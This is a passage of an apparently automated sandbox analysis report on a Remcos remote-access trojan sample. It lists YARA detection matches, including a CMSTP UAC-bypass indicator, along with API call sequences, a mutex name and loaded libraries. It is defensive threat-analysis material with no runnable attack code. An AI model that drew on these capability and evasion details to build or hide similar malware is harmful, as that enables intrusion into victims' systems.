                      Source: Yara matchFile source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.4758896538.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe PID: 5272, type: MEMORYSTR

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Contains functionalty to change the wallpaper
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0041BB77 SystemParametersInfoW,1_2_0041BB77

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, type: SAMPLEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 1.0.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 1.0.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 1.0.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe PID: 5272, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle,1_2_0041ACC1
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle,1_2_0041ACED
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,1_2_004158B9
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0041D0711_2_0041D071
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_004520D21_2_004520D2
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0043D0981_2_0043D098
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_004371501_2_00437150
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_004361AA1_2_004361AA
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_004262541_2_00426254
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_004313771_2_00431377
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0041E5DF1_2_0041E5DF
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0044C7391_2_0044C739
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_004267CB1_2_004267CB
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0043C9DD1_2_0043C9DD
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00432A491_2_00432A49
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0043CC0C1_2_0043CC0C
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00434D221_2_00434D22
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00426E731_2_00426E73
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00440E201_2_00440E20
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0043CE3B1_2_0043CE3B
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00412F451_2_00412F45
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00452F001_2_00452F00
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00426FAD1_2_00426FAD
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: String function: 00401F66 appears 50 times
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: String function: 004020E7 appears 41 times
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: String function: 004338A5 appears 42 times
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: String function: 00433FB0 appears 55 times
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 1.0.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 1.0.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 1.0.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe PID: 5272, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@1/0@0/1
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,1_2_00416AB7
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,1_2_0040E219
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,1_2_0041A63F
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,1_2_00419BC4
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-4NJUM7
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: XCG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: XCG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: Software\1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: Rmc-4NJUM71_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: Exe1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: Exe1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: Rmc-4NJUM71_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: 0DG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: Inj1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: Inj1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: XCG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: XCG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: XCG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: BG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: BG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: BG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: @CG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: BG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: exepath1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: XCG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: @CG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: exepath1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: BG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: XCG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: licence1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: XCG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: XCG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: XCG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: XCG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: XCG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: XCG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: XCG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: `=G1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: XCG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: XCG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: dCG1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: Administrator1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: User1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: del1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: del1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCommand line argument: del1_2_0040D767
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeReversingLabs: Detection: 87%
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeSection loaded: cryptbase.dllJump to behavior
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
